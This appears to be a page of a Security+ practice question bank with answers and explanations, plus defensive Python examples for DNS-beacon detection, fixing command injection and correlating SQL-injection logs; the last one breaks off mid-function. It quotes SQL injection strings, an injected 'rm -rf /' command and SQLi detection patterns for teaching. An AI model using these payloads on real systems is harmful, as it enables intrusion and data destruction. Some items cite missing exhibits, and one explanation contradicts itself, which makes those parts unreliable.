Security+ SY0-701 — Questions 601–675

1152 questions total · 16 pages · All types, answers revealed

Page 9 of 16
601
MCQ · medium

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

A. This is normal DNS behavior, so no action is needed unless users report an outage.
B. Suspect DNS-based command-and-control, then isolate the server and collect logs and packet data for analysis.
C. Rotate the DNS server's administrator password and leave the web server online.
D. Assume the web server is performing routine certificate renewal checks and ignore the alert.
Answer: B

Regular outbound DNS queries to random subdomains can indicate tunneling or command-and-control traffic. The fact that it repeats at a fixed interval strengthens that suspicion. The best next step is to contain the host so the activity cannot continue, while preserving logs and packet captures for investigation. This lets the team determine whether malware, a rogue process, or a misconfiguration is responsible without losing evidence.

Why this answer

The small, periodic DNS queries to random-looking subdomains under an unused domain are a classic indicator of DNS-based command-and-control (C2) communication. Attackers often use DNS tunneling to exfiltrate data or send commands, as DNS traffic is typically allowed through firewalls. The fact that the pattern persists even during idle web traffic confirms it is not related to normal server operations, making isolation and forensic collection the appropriate next step.

Exam trap

The trap here is that candidates may mistake periodic DNS queries for legitimate maintenance traffic (like certificate renewal or NTP sync) and overlook the key indicator of random-looking subdomains under an unused domain, which is a hallmark of DNS tunneling for C2.

How to eliminate wrong answers

Option A is wrong because periodic DNS queries to random subdomains under an unused domain are not normal DNS behavior; legitimate DNS queries are typically for known, resolvable domains and do not exhibit a consistent 60-second pattern during idle periods. Option C is wrong because rotating the DNS server's administrator password does not address the compromised web server's outbound C2 traffic; the server itself must be isolated and investigated. Option D is wrong because certificate renewal checks use well-known domains (e.g., from a Certificate Authority) and do not involve random-looking subdomains under an unused domain; ignoring the alert could allow persistent C2 activity to continue.
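As an added illustration (not part of the question bank), the following Python script applies the two indicators the explanation relies on, a fixed query interval and random-looking subdomain labels, to a constructed resolver log. The log format, client addresses and domain names are made up for the example; a real deployment would read the resolver's own log format.

```python
import math
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample resolver log (not from the page). Format assumed:
# "<ISO timestamp> <client ip> query <qname>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.5.21 query www.example.com
2024-05-01T10:00:00 10.0.5.21 query k3j9x2q8v1.unused-example.net
2024-05-01T10:00:17 10.0.5.21 query cdn.example.com
2024-05-01T10:01:00 10.0.5.21 query p7d2m0z4ab.unused-example.net
2024-05-01T10:02:00 10.0.5.21 query x9q1lt5c7w.unused-example.net
2024-05-01T10:03:00 10.0.5.21 query b4n8h2r6yk.unused-example.net
2024-05-01T10:03:42 10.0.5.21 query ocsp.example-ca.com
2024-05-01T10:04:00 10.0.5.21 query z2v6w3j0qm.unused-example.net
2024-05-01T10:05:00 10.0.5.21 query r8t1g5y9nc.unused-example.net
2024-05-01T10:00:30 10.0.5.22 query www.example.com
2024-05-01T10:07:10 10.0.5.22 query mail.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+query\s+(\S+)$")


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label.
    Human-chosen labels (www, cdn, mail) score low; random-looking ones score high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text: str):
    """Yield (timestamp, client, base domain, leftmost label) for each query line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, qname = m.groups()
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # no subdomain label to inspect
        base = ".".join(labels[-2:])  # simplification: last two labels are the zone
        events.append((datetime.fromisoformat(ts), client, base, labels[0]))
    return events


def find_beacons(text: str, min_queries: int = 5, max_jitter: float = 0.1,
                 min_entropy: float = 3.0):
    """Flag (client, zone) pairs whose queries arrive at a near-constant interval
    and whose subdomain labels look random. Thresholds are illustrative."""
    groups = defaultdict(list)
    for ts, client, base, sub in parse_log(text):
        groups[(client, base)].append((ts, sub))

    hits = []
    for (client, base), items in groups.items():
        if len(items) < min_queries:
            continue
        items.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(items, items[1:])]
        mean_gap = sum(gaps) / len(gaps)
        if mean_gap <= 0:
            continue
        variance = sum((g - mean_gap) ** 2 for g in gaps) / len(gaps)
        jitter = math.sqrt(variance) / mean_gap  # coefficient of variation
        entropy = sum(label_entropy(s) for _, s in items) / len(items)
        if jitter <= max_jitter and entropy >= min_entropy:
            hits.append({
                "client": client,
                "domain": base,
                "queries": len(items),
                "interval_s": round(mean_gap, 1),
                "jitter": round(jitter, 3),
                "label_entropy": round(entropy, 2),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

The ordinary lookups (www, cdn, ocsp) are never flagged: too few per zone, and their labels carry little entropy, which is the distinction the question turns on.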

602
MCQ · medium

A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?

A. Worm, because it is spreading automatically to nearby systems on the network.
B. Trojan, because it is disguised as a harmless utility while delivering malicious payloads.
C. Ransomware, because files would be encrypted and a payment demand would appear.
D. Rootkit, because the malware is hiding its own presence by modifying kernel behavior.
Answer: B

A trojan commonly masquerades as a legitimate application, then installs or runs additional malicious functions such as credential theft and persistence.

Why this answer

Option B is correct because the malware is disguised as a legitimate 'System Update' application, which is the classic behavior of a Trojan. Trojans rely on social engineering to trick users into executing them, and once activated, they can deliver secondary payloads such as password stealers, browser hijackers, or backdoors. In this scenario, the Trojan likely installed a keylogger or credential harvester to exfiltrate saved passwords, changed browser settings via registry or configuration file manipulation, and increased outbound traffic to a command-and-control (C2) server.

Exam trap

The trap here is that candidates may confuse the visible symptoms (browser change, increased traffic) with a worm's network propagation or a rootkit's stealth, but the key indicator is the social engineering disguise of the 'System Update' application, which is the hallmark of a Trojan.

How to eliminate wrong answers

Option A is wrong because a worm spreads autonomously across networks without user interaction, often exploiting vulnerabilities like SMB or RDP, whereas this infection required the user to execute the fake update at login. Option C is wrong because ransomware typically encrypts files and displays a ransom note, but the symptoms here (browser homepage change, increased traffic, stolen passwords) indicate data theft and persistence, not file encryption. Option D is wrong because a rootkit hides its presence by modifying kernel or system call tables (e.g., SSDT hooking), but the described behavior involves visible changes (homepage alteration, password theft) and no mention of stealth or kernel-level concealment.

603
MCQ · medium

EDR detects encoded PowerShell launched from a word processor, an attempt by a process to read LSASS memory, and an outbound HTTPS connection to a rare domain. What should the analyst do first?

A. Isolate the endpoint from the network while keeping it powered on for investigation.
B. Delete the user's profile to stop the malicious process immediately.
C. Patch the word processor before reviewing any alerts or logs.
D. Reboot the system immediately to clear anything running in memory.
Answer: A

This is the correct first action because the host shows clear signs of active compromise and possible credential theft. Network isolation limits further spread and command-and-control activity, while leaving the system powered on preserves volatile evidence for later analysis. That balance supports both containment and investigation, which is the right sequence when EDR indicates live malicious behavior.

Why this answer

The EDR alerts indicate a likely credential theft attempt (LSASS read) and C2 communication (rare domain). Isolating the endpoint preserves forensic evidence in memory and disk while preventing further data exfiltration or lateral movement, which is the immediate containment priority per incident response best practices.

Exam trap

The trap here is that candidates may choose reboot (D) thinking it clears malware, but CompTIA emphasizes preserving evidence and containing the threat first, as rebooting destroys volatile data needed for forensic analysis.

How to eliminate wrong answers

Option B is wrong because deleting the user profile destroys volatile evidence (e.g., process memory, registry artifacts) and may not stop a process running in system context. Option C is wrong because patching the word processor is a long-term remediation step, not an immediate response to an active compromise. Option D is wrong because rebooting clears memory-resident malware and forensic artifacts, potentially losing critical evidence of the attack chain.

604
Matching · medium

Match each business scenario to the most appropriate risk treatment.

1. A legacy reporting server is expensive to replace, and leadership is willing to monitor the low expected loss for now.
2. A public web portal is being hit by credential stuffing, so the team adds MFA and rate limiting.
3. The organization wants protection from a costly third-party outage by purchasing cyber insurance.
4. A proposed project would collect regulated data that the business has decided not to process at all.

Concepts: Accept, Mitigate, Transfer, Avoid

Matches: 1 → Accept, 2 → Mitigate, 3 → Transfer, 4 → Avoid

Why these pairings

Risk acceptance acknowledges the risk without action; mitigation reduces risk via controls; transfer shifts risk to insurance; avoidance eliminates the risk activity; reduction and sharing are related but less direct matches to the scenarios.

605
Multi-Select · hard

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

A. Require administrators to connect to a bastion host or jump server before reaching the Linux servers.
B. Let all corporate laptops connect directly to SSH on the servers if MFA is enabled.
C. Restrict management interfaces so only the bastion host can reach them and log each session.
D. Expose SSH to the internet because key-based authentication is already strong.
E. Use split tunneling for admin traffic so management packets can bypass the VPN.
Answers: A, C

A bastion host is a hardened choke point for privileged access, so all administrative sessions can be concentrated, filtered, and monitored. It prevents direct SSH exposure from general user systems and gives the security team a single place to enforce logging and session control. This is a common hardened management-path pattern.

Why this answer

Option A is correct because a bastion host (jump server) acts as a single, hardened entry point that administrators must connect to before reaching internal Linux servers. This eliminates direct SSH access from employee laptops, reducing the attack surface and preventing lateral movement if an admin endpoint is compromised. The bastion host can also enforce centralized logging of all administrative sessions, meeting the security team's requirement for session recording.

Exam trap

The trap here is that candidates often think MFA alone (Option B) is sufficient to secure direct access, but the question specifically requires reducing lateral movement and logging sessions, which only a bastion host with restricted access (Option A and C) can fully achieve.

606
MCQ · easy

A company runs a Linux virtual machine in an IaaS cloud service. The provider secures the physical datacenter and hypervisor. Which task remains the company's responsibility?

A. Patching the guest operating system on the virtual machine.
B. Replacing failed physical storage drives in the provider's data center.
C. Hardening the hypervisor that hosts the cloud tenant.
D. Controlling badge access to the cloud vendor's server room.
Answer: A

In an IaaS model, the organization still manages what runs inside the VM, including the guest operating system, patches, applications, and configuration. The cloud provider secures the underlying facility, hardware, and hypervisor, but it does not maintain the customer's OS or application stack. Keeping the guest OS patched is essential to reduce exposure to known vulnerabilities and aligns with the shared responsibility model.

Why this answer

In an IaaS cloud model, the provider is responsible for the physical infrastructure, including the datacenter, network, storage, and hypervisor. The customer retains responsibility for securing the guest operating system, including applying patches and updates. Under the shared responsibility model, patching the guest OS sits on the customer's side of the split, so it falls squarely on the company operating the virtual machine.

Exam trap

The trap here is that candidates often confuse the shared responsibility model and assume the cloud provider handles all security tasks, including guest OS patching, when in fact the customer is responsible for anything above the hypervisor.

How to eliminate wrong answers

Option B is wrong because replacing failed physical storage drives is the responsibility of the cloud provider, who manages the underlying hardware in the datacenter. Option C is wrong because hardening the hypervisor is also the provider's responsibility, as the hypervisor is part of the virtualization layer that the customer does not have administrative access to.

607
MCQ · easy

A company launches a new HTTPS portal. Users should be able to confirm the site is really the company's portal and not a fake copy. Which control provides that trust?

A. A self-signed certificate installed only on user laptops
B. A TLS certificate issued by a trusted certificate authority
C. A SHA-256 checksum posted on the login page
D. A shared password embedded in the page source
Answer: B

A trusted CA-issued certificate lets browsers validate the site identity and build user trust securely.

Why this answer

A TLS certificate issued by a trusted certificate authority (CA) provides the trust needed because browsers and operating systems maintain a root store of trusted CAs. When a user visits the HTTPS portal, the server presents a certificate signed by that CA, and the browser cryptographically verifies the signature chain back to a trusted root. This ensures the public key belongs to the claimed domain, authenticating the server and preventing impersonation by a fake copy.

Exam trap

The trap here is that candidates confuse integrity checks (like SHA-256 checksums) with authentication mechanisms, or they think a self-signed certificate can be trusted if installed locally, but in practice, self-signed certificates lack the third-party validation needed to prevent man-in-the-middle attacks on a public-facing portal.

How to eliminate wrong answers

Option A is wrong because a self-signed certificate is not trusted by default by browsers or operating systems; it would generate a security warning and does not provide any third-party validation of the server's identity, so users cannot reliably confirm the site is genuine. Option C is wrong because a SHA-256 checksum posted on the login page can be easily modified by an attacker who controls the fake site, and it provides no cryptographic binding to the server's identity or domain; checksums are used for file integrity, not server authentication.

608
MCQ · hard

Based on the exhibit, what is the best next step before the hotfix is released?

A. Deploy immediately because the issue is customer-facing and urgent.
B. Close the ticket after deployment and create a postmortem if users complain.
C. Ask support to warn users that sign-in may fail during the next hour.
D. Pause release until the change is formally approved, tested, and has a documented rollback path.
Answer: D

The exhibit shows multiple process gaps: skipped tests, unresolved integration test failure, no documented rollback plan, and only verbal approval. Even an emergency fix should follow an emergency change process with documented authorization and enough validation to reduce the chance of making the outage worse. The safest next step is to complete the required change controls before production deployment.

Why this answer

Option D is correct because releasing a hotfix without formal approval, testing, and a documented rollback path violates the change management policy required by security program management. Even for urgent customer-facing issues, skipping these steps risks introducing new vulnerabilities or breaking other systems, which could lead to a larger outage. The exhibit indicates a need for controlled change processes, so pausing until the change is properly vetted ensures stability and security.

Exam trap

The trap here is that candidates may prioritize speed over security, assuming that a customer-facing issue justifies skipping change management, but the exam emphasizes that formal approval and testing are non-negotiable even for urgent fixes.

How to eliminate wrong answers

Option A is wrong because deploying immediately without testing or approval bypasses change management controls, potentially causing unintended side effects or security gaps. Option B is wrong because closing the ticket after deployment and only creating a postmortem if users complain ignores proactive risk management and fails to document the change properly, which is a key oversight in security program management. Option C is wrong because asking support to warn users is a temporary workaround that does not address the root cause or ensure the fix is safe; it also lacks the formal approval and testing required for a hotfix.

609
MCQ · medium

A customer portal must keep operating if one application server fails. Management wants the simplest and lowest-cost design that still improves availability. What should the team implement?

A. Add more backups and schedule them every hour.
B. Use a second data center with synchronous replication and active-active clustering.
C. Deploy a hot standby application server with automatic failover.
D. Restart the failed server manually after the help desk is notified.
Answer: C

A hot standby provides a ready replacement if the primary application server fails, and automatic failover restores service without waiting for manual intervention. This design improves availability while staying simpler and less costly than a full active-active architecture across multiple sites. It matches the business need for continuity after one server failure without overengineering the solution.

Why this answer

A hot standby (active/passive) application server with automatic failover provides the simplest and lowest-cost improvement to availability. It eliminates the single point of failure by having a standby server ready to take over if the primary fails, without requiring complex load balancing or synchronous replication. This design directly addresses the requirement of keeping the portal operational during a single server failure while minimizing cost and complexity.

Exam trap

The trap here is that candidates often confuse high availability with disaster recovery, choosing synchronous replication and a second data center (Option B) when a simpler active/passive failover within the same site meets the requirement at lower cost.

How to eliminate wrong answers

Option A is wrong because increasing backup frequency does not improve availability; backups protect against data loss, not server failure, and the portal would still be unavailable until restored from backup. Option B is wrong because a second data center with synchronous replication and active-active clustering is significantly more complex and expensive, involving geographic redundancy, network latency management, and load balancing, which exceeds the 'simplest and lowest-cost' requirement.

610
MCQ · hard

Based on the exhibit, what best describes the additional measures applied to the legacy system?

A. Preventive controls, because they stop every possible compromise completely.
B. Compensating controls, because they reduce risk when the preferred security controls are not possible.
C. Corrective controls, because they repair the controller after an incident occurs.
D. Deterrent controls, because they mainly scare attackers away from trying.
Answer: B

Compensating controls are the best description because the system cannot support MFA or modern encryption, yet the organization still needs to reduce risk until replacement. The VLAN, ACLs, jump host, and session recording provide alternate safeguards that help offset the missing native controls.

Why this answer

The exhibit shows a legacy system that cannot support modern authentication protocols like Kerberos or NTLMv2. The additional measures—such as network segmentation, strict firewall rules, and an application-layer gateway—are compensating controls. They reduce risk by enforcing security in the network layer since the preferred control (upgrading the OS or application to support strong authentication) is not feasible.

Exam trap

CompTIA often tests the distinction between compensating controls and preventive controls by describing a scenario where the ideal control is impossible, and candidates mistakenly choose 'preventive' because the compensating control still blocks some attacks.

How to eliminate wrong answers

Option A is wrong because preventive controls aim to stop threats, but no control can 'stop every possible compromise completely'; the measures described are not absolute and are applied because the ideal preventive control (e.g., patching the legacy system) is unavailable. Option C is wrong because corrective controls operate after an incident to restore operations (e.g., restoring from backup), whereas the measures here are proactive and in place before any incident occurs. Option D is wrong because deterrent controls rely on psychological discouragement (e.g., warning banners), not on technical enforcement like segmentation and firewalls; the described measures actively block or restrict traffic, not merely scare attackers.

611
MCQ · medium

A system administrator downloads a vendor patch package and a separate checksum file. After the download completes, the administrator runs a command that produces a SHA-256 value for the package and compares it to the vendor's published value. Which cryptographic primitive is being used for the comparison?

A. Hashing
B. Symmetric encryption
C. Digital signatures
D. Asymmetric encryption
Answer: A

Hashing creates a fixed-length digest from data so the receiver can compare values and detect changes. In this scenario, the administrator is generating a SHA-256 result and comparing it to the vendor's published value to confirm the package has not changed. That use case is about integrity verification rather than encryption or identity proof.

Why this answer

The administrator is using SHA-256 to compute a fixed-length digest of the downloaded package and comparing it to the vendor's published checksum. This is a classic application of a cryptographic hash function (hashing), which produces a unique, irreversible fingerprint of data. The comparison verifies integrity—ensuring the package has not been altered during transit—but does not provide authentication or non-repudiation.

Exam trap

The trap here is that candidates confuse integrity verification via hashing with authentication provided by digital signatures, especially when the question mentions a 'vendor' and 'comparison'—leading them to incorrectly choose digital signatures (Option C) even though no signature verification is performed.

How to eliminate wrong answers

Option B (Symmetric encryption) is wrong because it uses a shared secret key to encrypt and decrypt data, not to produce a fixed-length digest for integrity verification. Option C (Digital signatures) is wrong because they combine hashing with asymmetric encryption to provide authentication and non-repudiation, but the scenario only describes comparing a hash value, not verifying a signature with a public key. Option D (Asymmetric encryption) is wrong because it uses a public/private key pair for encryption or key exchange, not for generating a checksum to compare against a published value.

612
MCQ · hard

Based on the exhibit, what is the BEST remediation for the application flaw shown? A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

A. Keep the current shell command, but add HTML encoding to the response page.
B. Replace the shell call with a safe library function and strictly allowlist approved host values.
C. Increase the web server timeout so the ping utility has more time to complete.
D. Require users to authenticate before they can access the page.
Answer: B

The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.

Why this answer

Option B is correct because the application flaw is command injection: a user-controlled parameter is passed directly to a shell command (e.g., `ping`). The best remediation is to replace the shell call with a safe library function (e.g., `InetAddress.isReachable()` in Java or a dedicated ICMP library) and strictly allowlist approved internal host values, eliminating the possibility of injecting arbitrary commands like `; rm -rf /`.

Exam trap

The trap here is that candidates often confuse command injection with cross-site scripting (XSS) and choose HTML encoding (Option A), or they mistakenly think authentication (Option D) or timeout adjustments (Option C) can fix a code-level injection vulnerability.

How to eliminate wrong answers

Option A is wrong because HTML encoding the response does not prevent the shell command from executing with malicious input; it only mitigates reflected XSS, not command injection. Option C is wrong because increasing the web server timeout does not address the injection vulnerability; it only changes the execution window for the ping utility, leaving the flaw exploitable. Option D is wrong because requiring authentication does not prevent an authenticated user from injecting commands; it only adds a login gate, not input validation or safe execution.
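An added example (not from the question bank) of the Option B remediation in Python: the shell-based "before" is kept only for contrast, and the hardened version first checks the parameter against an allowlist of approved internal hosts and then runs `ping` through an argument vector with no shell, which is the standard-library equivalent of the safe library call the explanation describes. The allowlisted hostnames and address are constructed.

```python
import ipaddress
import re
import subprocess

# Constructed allowlist of approved internal targets (assumption; not from the page).
APPROVED_HOSTS = frozenset({"app01.corp.example", "db01.corp.example", "10.10.20.5"})

# RFC 1123 hostname syntax: labels of letters, digits and hyphens, 1-63 chars each.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def vulnerable_ping(raw: str) -> int:
    """BEFORE: the user-controlled value is spliced into a shell command line.
    Shown only for contrast and never called here; a shell metacharacter in
    `raw` changes what the shell executes (the command-injection flaw)."""
    return subprocess.run(f"ping -c 1 {raw}", shell=True).returncode


def canonical_host(raw: str):
    """Return the canonical form of a syntactically valid IP address or hostname,
    or None when the input is not a plain host (e.g. contains ';', spaces, '$')."""
    host = raw.strip().lower().rstrip(".")
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    return host if HOSTNAME_RE.match(host) else None


def is_approved(raw: str) -> bool:
    """Allowlist check: the primary control. Only known-good targets pass."""
    host = canonical_host(raw)
    return host is not None and host in APPROVED_HOSTS


def ping_argv(raw: str):
    """AFTER: build an argument vector for ping. No shell is involved, so the
    target is always a single argv element, and it must be allowlisted first."""
    if not is_approved(raw):
        raise ValueError("host is not an approved internal target")
    return ["ping", "-c", "1", canonical_host(raw)]


def check_connectivity(raw: str) -> bool:
    """Run the allowlisted connectivity check without shell interpretation."""
    result = subprocess.run(ping_argv(raw), shell=False,
                            capture_output=True, timeout=10)
    return result.returncode == 0


if __name__ == "__main__":
    for candidate in ["app01.corp.example", "10.10.20.5", "app01.corp.example; id"]:
        print(candidate, "->", "approved" if is_approved(candidate) else "rejected")
```

Rejecting anything that is not an allowlisted host is what makes the fix hold even for authenticated users, which is why Option D on its own does not close the flaw.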

613
MCQ · easy

A small company wants all employees to lock their screens after 10 minutes of inactivity, and the rule is included in the formal security policy. What type of control is this?

A. Detective control, because it discovers misuse after it happens.
B. Directive control, because it tells users what behavior is required.
C. Corrective control, because it repairs damage after an incident.
D. Compensating control, because it replaces a missing technical safeguard.
Answer: B

Directive controls guide or instruct behavior through policy, standards, or required procedures. A formal screen-lock requirement tells users and administrators what must be done, so it is a directive control.

Why this answer

A directive control is designed to guide or mandate user behavior through policies or procedures. In this case, the security policy explicitly requires employees to lock their screens after 10 minutes of inactivity, which is a directive that tells users what they must do. This is a procedural control, not a technical enforcement mechanism, so it falls under directive controls.

Exam trap

The trap here is confusing a directive control (policy-based) with a preventive control (technical enforcement); candidates often pick a wrong option because they assume the policy itself enforces the lock, but the question states the rule is 'included in the formal security policy,' not implemented via a technical mechanism.

How to eliminate wrong answers

Option A is wrong because a detective control identifies or logs misuse after it occurs (e.g., audit logs or intrusion detection), but the policy itself does not detect anything—it only states a required behavior. Option C is wrong because a corrective control is applied after an incident to restore normal operations (e.g., backup restoration or patching), not to prevent or mandate behavior. Option D is wrong because a compensating control is an alternative safeguard used when a primary control cannot be implemented (e.g., using multi-factor authentication when smart cards are unavailable), but here the policy is the primary control, not a replacement for a missing technical safeguard.

614
Drag & Drop · medium

Drag and drop the steps to perform a password reset for a user in Active Directory into the correct order.

Why this order

Password reset in AD is done via ADUC; the admin must have appropriate permissions, and it's good practice to enforce change at next logon.

615
MCQ · medium

A SaaS vendor supports both browser access and a mobile app. The company wants employees to sign in with corporate credentials, avoid separate passwords for each app, and use token-based authentication that works well with modern APIs. Which integration should the architect choose?

A. SAML federation to the SaaS vendor using browser assertions only.
B. OpenID Connect federation with the corporate identity provider.
C. LDAP bind authentication directly against each SaaS application.
D. Kerberos tickets issued directly by the SaaS vendor.
Answer: B

OpenID Connect is built on modern token-based authentication and works well for browser, mobile, and API-driven applications.

Why this answer

OpenID Connect (OIDC) is the correct choice because it is an identity layer built on top of OAuth 2.0, designed for token-based authentication that works seamlessly with modern REST APIs and mobile apps. It allows employees to sign in with corporate credentials via the corporate identity provider (IdP), eliminates separate app passwords, and issues ID tokens (JWT) and access tokens that the SaaS vendor can validate without browser redirects.

Exam trap

The trap here is that candidates often confuse SAML (which is browser-based) with OpenID Connect, assuming SAML can handle mobile apps and API tokens just as easily, but SAML lacks native support for token-based API authentication without complex extensions.

How to eliminate wrong answers

Option A is wrong because SAML federation using browser assertions only works well for web-based access but does not natively support mobile apps or token-based API authentication without additional extensions like SAML Bearer Assertion for OAuth 2.0, making it less suitable for modern API-driven scenarios. Option C is wrong because LDAP bind authentication requires direct network connectivity to the corporate directory, exposes credentials to each SaaS application, and does not provide token-based authentication or single sign-on across apps. Option D is wrong because Kerberos tickets are designed for on-premises Windows environments and require the SaaS vendor to be part of the same Kerberos realm, which is impractical for cloud-based SaaS; they also do not integrate with modern REST APIs or token-based flows.

616
MCQ · easy

A company uses an encryption key for a database backup process. The key is being replaced because the old one is near the end of its approved use period. What is this action called?

A. Key rotation, because an older key is replaced with a new one on schedule.
B. Key compression, because the key is made smaller before use.
C. Key translation, because the key is converted into another language.
D. Key formatting, because the key is stored in a different file type.
Answer: A

Key rotation is the planned replacement of cryptographic keys over time. Rotating keys reduces exposure if a key is mishandled, limits the amount of data protected by any one key, and supports good key lifecycle management.

Why this answer

Key rotation is the scheduled replacement of an older encryption key with a new one, typically performed before the end of the key's cryptoperiod to maintain security and compliance. In this scenario, the database backup key is being replaced because it is near the end of its approved use period, which directly matches the definition of key rotation. This practice limits the amount of data encrypted with a single key and reduces the impact of a potential key compromise.

Exam trap

The trap here is that candidates may confuse key rotation with other key management terms like key escrow or key archival, or incorrectly assume that 'rotation' implies a physical or mechanical action rather than a cryptographic lifecycle process.

How to eliminate wrong answers

Option B is wrong because key compression is not a standard cryptographic operation; keys are not compressed before use, and compression would not address the end of a key's approved use period. Option C is wrong because key translation refers to converting a key from one format or domain to another (e.g., in a key management system or HSM), not replacing an expiring key. Option D is wrong because key formatting is not a recognized term for key lifecycle management; changing a key's file type does not constitute a scheduled replacement.

617
MCQ · hard

Based on the exhibit, which issue should be remediated first by the operations team? A small company has limited maintenance windows and can address only one of several findings this week.

A. db-lab02, because high-severity findings always outrank medium and critical findings.
B. printsrv03, because it is internet-facing and has no vendor patch available.
C. vpn-gw01, because it is internet-facing, exploitable now, and a fix is available.
D. None of these, because the team should wait for the next quarterly review before changing anything.
Answer: C

The VPN gateway is the most urgent issue because it is externally reachable, has a critical remote code execution flaw, and a vendor patch already exists. That combination creates high likelihood and high impact. The reboot requirement is inconvenient, but it is still the most actionable and dangerous finding. The other issues are either isolated from production or partially mitigated by compensating controls.

Why this answer

Option C is correct because vpn-gw01 is internet-facing, is exploitable right now, and already has a vendor patch. In vulnerability prioritization, an asset that is exposed to the internet, currently exploitable, and fixable gets the first maintenance window, because that combination maximizes both the likelihood of compromise and the value of acting. Note that a CVSS base score measures severity, not whether exploitation is actually occurring; exploitation status comes from the exhibit and from sources such as exploit availability or known-exploited-vulnerability catalogs, which is why the option text says "exploitable now" rather than quoting a score.

Exam trap

The trap here is that candidates often assume severity (e.g., critical vs. high) is the sole determinant of remediation priority, ignoring the critical factors of internet exposure, exploitability, and patch availability that CompTIA emphasizes in risk management scenarios.

How to eliminate wrong answers

Option A is wrong because it incorrectly states that high-severity findings always outrank medium and critical findings; severity is only one factor in prioritization, and internet exposure, exploitability, and patch availability are equally important. Option B is wrong because printsrv03, while internet-facing with no vendor patch, does not have an active exploit, making it less urgent than an asset that is currently exploitable. Option D is wrong because waiting for the next quarterly review would leave a known, exploitable vulnerability unpatched, violating the principle of timely remediation for critical risks.

618
MCQmedium

A security analyst is reviewing web server logs after a user reports that the company website displayed an error message containing raw database queries. The log shows repeated requests to the product search page with the following parameter: `?id=1 OR 1=1`. Which of the following should the analyst do FIRST to confirm the nature of the suspected attack?

A.Run a vulnerability scan against the web server.
B.Block the source IP address in the firewall.
C.Verify the request details against the web application firewall logs.
D.Isolate the web server from the network immediately.
AnswerC

Checking the WAF logs is the correct first step. They show whether the `1 OR 1=1` requests were recognized as SQL injection and blocked, or whether they reached the application, which the raw database queries in the user's report suggest. Confirming what actually happened, including whether the error page itself is leaking query structure, comes before any containment.

Why this answer

Option C is correct because the analyst should first verify the request details against the web application firewall (WAF) logs to confirm whether the WAF detected and blocked the SQL injection attempt. The parameter `?id=1 OR 1=1` is a classic SQL injection payload, and WAF logs provide immediate evidence of whether the request was flagged, allowed, or blocked, enabling the analyst to correlate the user's report with actual security controls before taking further action.

Exam trap

The trap here is that candidates may jump to containment (blocking or isolating) or scanning without first using existing logs to confirm the attack, failing to follow the incident response principle of 'verify before act'.

How to eliminate wrong answers

Option A is wrong because running a vulnerability scan is a proactive assessment step that should occur after confirming the attack; it does not help confirm the nature of a specific reported incident. Option B is wrong because blocking the source IP address in the firewall is a reactive containment measure that should be taken only after confirming the attack and understanding its scope, not as the first step. Option D is wrong because isolating the web server from the network immediately is an extreme containment action that could disrupt business operations and is premature without first confirming the attack via logs.
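As an added example (not code from the original page), here is how an analyst could confirm the suspected injection from the two log sources the question names: flag requests whose decoded parameters look like SQL injection, then look up each one in the WAF log to see whether it was blocked or only logged. The access log and WAF log formats, addresses, paths and timestamps are all constructed for this example; the two small parsers are the only parts you would adapt to your own formats.

```python
"""Correlate suspicious web server requests with WAF verdicts.

All sample log lines below are constructed for this example."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed combined-format access log. The 500 on the second line is the
# request that produced the raw database error the user reported.
ACCESS_LOG = """\
203.0.113.45 - - [12/May/2025:10:01:03 +0000] "GET /products/search?id=1 HTTP/1.1" 200 5120
203.0.113.45 - - [12/May/2025:10:01:09 +0000] "GET /products/search?id=1%20OR%201%3D1 HTTP/1.1" 500 812
203.0.113.45 - - [12/May/2025:10:01:15 +0000] "GET /products/search?id=1%27%20UNION%20SELECT%20NULL-- HTTP/1.1" 403 221
198.51.100.7 - - [12/May/2025:10:02:00 +0000] "GET /products/search?id=42 HTTP/1.1" 200 4980
"""

# Constructed WAF events in a simple key=value layout; "log" means the WAF saw
# the request but let it through, "block" means it was stopped.
WAF_LOG = """\
ts=2025-05-12T10:01:09Z src=203.0.113.45 rule=sqli-generic action=log uri=/products/search?id=1%20OR%201%3D1
ts=2025-05-12T10:01:15Z src=203.0.113.45 rule=sqli-union action=block uri=/products/search?id=1%27%20UNION%20SELECT%20NULL--
"""

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]+" (?P<status>\d{3})'
)

# Tautologies, UNION queries, comment terminators and stacked statements are
# the common shapes; extend the list for your own application.
SQLI_PATTERNS = [
    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"\bunion\b.+\bselect\b", re.I),
    re.compile(r"(--|#|/\*)"),
    re.compile(r";\s*(drop|insert|update|delete)\b", re.I),
]


def decoded_params(uri):
    """Query string parameters of a request URI, URL-decoded."""
    return dict(parse_qsl(urlsplit(uri).query, keep_blank_values=True))


def looks_like_sqli(uri):
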